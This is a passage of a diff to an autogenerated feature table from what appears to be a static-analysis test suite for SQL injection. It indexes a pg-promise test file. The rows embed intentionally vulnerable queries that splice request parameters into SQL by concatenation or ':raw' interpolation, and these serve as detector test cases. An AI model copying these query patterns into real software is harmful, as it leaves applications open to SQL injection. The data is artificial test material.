FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:21:3:23:4 | db.one( ... OK\\n }) | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:21:3:23:4 | db.one( ... OK\\n }) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:21:3:23:4 | exceptional return of db.one( ... OK\\n }) | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:21:3:23:4 | exceptional return of db.one( ... OK\\n }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:21:3:23:4 | exceptional return of db.one( ... OK\\n }) | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:21:3:23:4 | exceptional return of db.one( ... OK\\n }) | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:21:3:23:4 | exceptional return of db.one( ... OK\\n }) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:21:6:21:8 | one | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:21:6:21:8 | one | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:21:6:21:8 | one | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:21:6:21:8 | one | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:21:6:21:8 | one | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:21:10:23:3 | {\\n t ... OK\\n } | CalleeFlexibleAccessPath | db.one | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:21:10:23:3 | {\\n t ... OK\\n } | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:21:10:23:3 | {\\n t ... OK\\n } | calleeImports | pg-promise | @@ -3609,6 +17858,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:21:10:23:3 | {\\n t ... OK\\n } | enclosingFunctionName | get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:21:10:23:3 | {\\n t ... OK\\n } | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:21:10:23:3 | {\\n t ... OK\\n } | receiverName | db | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:22:5:22:8 | text | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:22:5:22:8 | text | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:22:5:22:8 | text | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:22:5:22:8 | text | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:22:5:22:8 | text | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:22:5:22:15 | text: query | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:22:5:22:15 | text: query | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:22:5:22:15 | text: query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:22:5:22:15 | text: query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:22:5:22:15 | text: query | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:22:5:22:15 | text: query | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:22:5:22:15 | text: query | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:22:5:22:15 | text: query | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:22:5:22:15 | text: query | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:22:5:22:15 | text: query | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:22:11:22:15 | query | CalleeFlexibleAccessPath | db.one | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:22:11:22:15 | query | InputAccessPathFromCallee | 0.text | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:22:11:22:15 | query | InputArgumentIndex | 0 | @@ -3619,6 +17883,31 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:22:11:22:15 | query | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:22:11:22:15 | query | enclosingFunctionName | get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:22:11:22:15 | query | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:24:3:24:4 | db | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:24:3:24:4 | db | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:24:3:24:4 | db | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:24:3:24:4 | db | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:24:3:24:4 | db | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:24:3:24:8 | db.one | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:24:3:24:8 | db.one | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:24:3:24:8 | db.one | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:24:3:24:8 | db.one | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:24:3:24:8 | db.one | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:24:3:27:4 | db.one( ... OK\\n }) | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:24:3:27:4 | db.one( ... OK\\n }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:24:3:27:4 | db.one( ... OK\\n }) | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:24:3:27:4 | db.one( ... OK\\n }) | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:24:3:27:4 | db.one( ... OK\\n }) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:24:3:27:4 | exceptional return of db.one( ... OK\\n }) | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:24:3:27:4 | exceptional return of db.one( ... OK\\n }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:24:3:27:4 | exceptional return of db.one( ... OK\\n }) | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:24:3:27:4 | exceptional return of db.one( ... OK\\n }) | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:24:3:27:4 | exceptional return of db.one( ... OK\\n }) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:24:6:24:8 | one | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:24:6:24:8 | one | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:24:6:24:8 | one | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:24:6:24:8 | one | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:24:6:24:8 | one | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:24:10:27:3 | {\\n t ... OK\\n } | CalleeFlexibleAccessPath | db.one | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:24:10:27:3 | {\\n t ... OK\\n } | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:24:10:27:3 | {\\n t ... OK\\n } | calleeImports | pg-promise | @@ -3628,6 +17917,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:24:10:27:3 | {\\n t ... OK\\n } | enclosingFunctionName | get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:24:10:27:3 | {\\n t ... OK\\n } | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:24:10:27:3 | {\\n t ... OK\\n } | receiverName | db | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:25:5:25:8 | text | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:25:5:25:8 | text | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:25:5:25:8 | text | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:25:5:25:8 | text | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:25:5:25:8 | text | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:25:5:25:44 | text: ' ... d = $1' | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:25:5:25:44 | text: ' ... d = $1' | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:25:5:25:44 | text: ' ... d = $1' | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:25:5:25:44 | text: ' ... d = $1' | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:25:5:25:44 | text: ' ... d = $1' | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:25:5:25:44 | text: ' ... d = $1' | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:25:5:25:44 | text: ' ... d = $1' | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:25:5:25:44 | text: ' ... d = $1' | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:25:5:25:44 | text: ' ... d = $1' | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:25:5:25:44 | text: ' ... d = $1' | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:25:11:25:44 | 'SELECT ... d = $1' | CalleeFlexibleAccessPath | db.one | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:25:11:25:44 | 'SELECT ... d = $1' | InputAccessPathFromCallee | 0.text | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:25:11:25:44 | 'SELECT ... d = $1' | InputArgumentIndex | 0 | @@ -3638,6 +17942,31 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:25:11:25:44 | 'SELECT ... d = $1' | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:25:11:25:44 | 'SELECT ... d = $1' | enclosingFunctionName | get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:25:11:25:44 | 'SELECT ... d = $1' | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:26:5:26:10 | values | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:26:5:26:10 | values | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:26:5:26:10 | values | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:26:5:26:10 | values | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:26:5:26:10 | values | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:26:5:26:25 | values: ... rams.id | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:26:5:26:25 | values: ... rams.id | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:26:5:26:25 | values: ... rams.id | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:26:5:26:25 | values: ... rams.id | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:26:5:26:25 | values: ... rams.id | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:26:5:26:25 | values: ... rams.id | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:26:5:26:25 | values: ... rams.id | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:26:5:26:25 | values: ... rams.id | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:26:5:26:25 | values: ... rams.id | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:26:5:26:25 | values: ... rams.id | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:26:13:26:15 | req | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:26:13:26:15 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:26:13:26:15 | req | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:26:13:26:15 | req | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:26:13:26:15 | req | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:26:13:26:22 | req.params | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:26:13:26:22 | req.params | contextSurroundingFunctionParameters | (req, res) | +| 